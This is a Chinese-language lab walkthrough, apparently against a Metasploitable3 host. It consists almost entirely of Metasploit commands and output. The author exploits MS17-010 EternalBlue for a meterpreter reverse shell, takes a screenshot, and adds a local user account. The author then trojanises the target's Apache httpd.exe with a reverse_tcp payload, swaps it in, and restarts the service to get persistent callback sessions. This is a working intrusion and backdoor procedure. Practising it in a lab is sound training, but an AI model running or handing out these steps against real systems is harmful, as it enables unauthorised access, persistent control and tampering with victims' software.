- 配置防火墙将相应的“阻塞端口安全策略”-- Disabled
- 查看全部关于ms17-010模块
msf6 > search ms17-010
- 对目标进行扫描
msf6 auxiliary(admin/smb/ms17_010_command) > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 auxiliary(admin/smb/ms17_010_command) > show options
扫描完成
msf6 auxiliary(admin/smb/ms17_010_command) > run
- 再尝试另一个扫描模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
- 对目标主机实施攻击
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.118.4
rhosts => 192.168.118.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
成功。
- 截屏
meterpreter > screenshot
Screenshot saved to: /root/BRSzCHir.jpeg
- 创建一个用户
meterpreter > shell
Process 3656 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>net user zzq 7076 /add
net user zzq 7076 /add
The command completed successfully.
- 留后门
meterpreter > ps -S httpd.exe
Filtering on 'httpd.exe'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
2336 480 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2944 2336 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe
meterpreter > kill 2944
Killing: 2944
meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download : c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
先杀死进程,再将其下载,然后把会话退到后台。
- 制作后门文件
msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 192.168.118.1
lhost => 192.168.118.1
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-door.exe
[*] Writing 29184 bytes to /root/httpd-door.exe...
- 启动一个监听,监听后门的反向连接,并使用 expolit-j 放到后台。
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp‘
msf6 exploit(multi/handler) > set lhost 192.168.118.1
lhost => 192.168.118.1
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.118.1:4444
- 切回之前的 meterpreter session,上传后门文件并重命名。
meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > pwd
c:\wamp\bin\apache\apache2.2.21\bin
meterpreter > mv httpd.exe httpd.exe.bak
meterpreter > upload /root/httpd-door.exe
[*] uploading : /root/httpd-door.exe -> httpd-door.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-door.exe -> httpd-door.exe
[*] uploaded : /root/httpd-door.exe -> httpd-door.exe
meterpreter > mv httpd-door.exe httpd.exe
- 重启 wampapache 服务。
meterpreter > shell
Process 1532 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.
The wampapache service was stopped successfully.
c:\wamp\bin\apache\apache2.2.21\bin>net start wampapache
[*] Sending stage (200262 bytes) to 192.168.118.4
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.
c:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 9 opened (192.168.118.1:4444 -> 192.168.118.4:49402) at 2021-02-26 23:31:39 +0800
[*] Sending stage (200262 bytes) to 192.168.118.4
服务启动后,返回了新的会话。
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.118.4 - Meterpreter session 8 closed. Reason: User exit
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
9 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.118.1:4444 -> 192.168.118.4:49402 (192.168.118.4)
msf6 exploit(multi/handler) > sessions 9
[*] Starting interaction with 9...
- 再留个后门
exploit/multi/handler 保持监听状态,每当对端的“httpd.exe”
重启,这边就会启动会话。
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.118.1:4444
[*] Sending stage (200262 bytes) to 192.168.118.4
[*] Meterpreter session 12 opened (192.168.118.1:4444 -> 192.168.118.4:49327) at 2021-02-26 23:45:18 +0800
meterpreter > shell
Process 3668 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.21>dir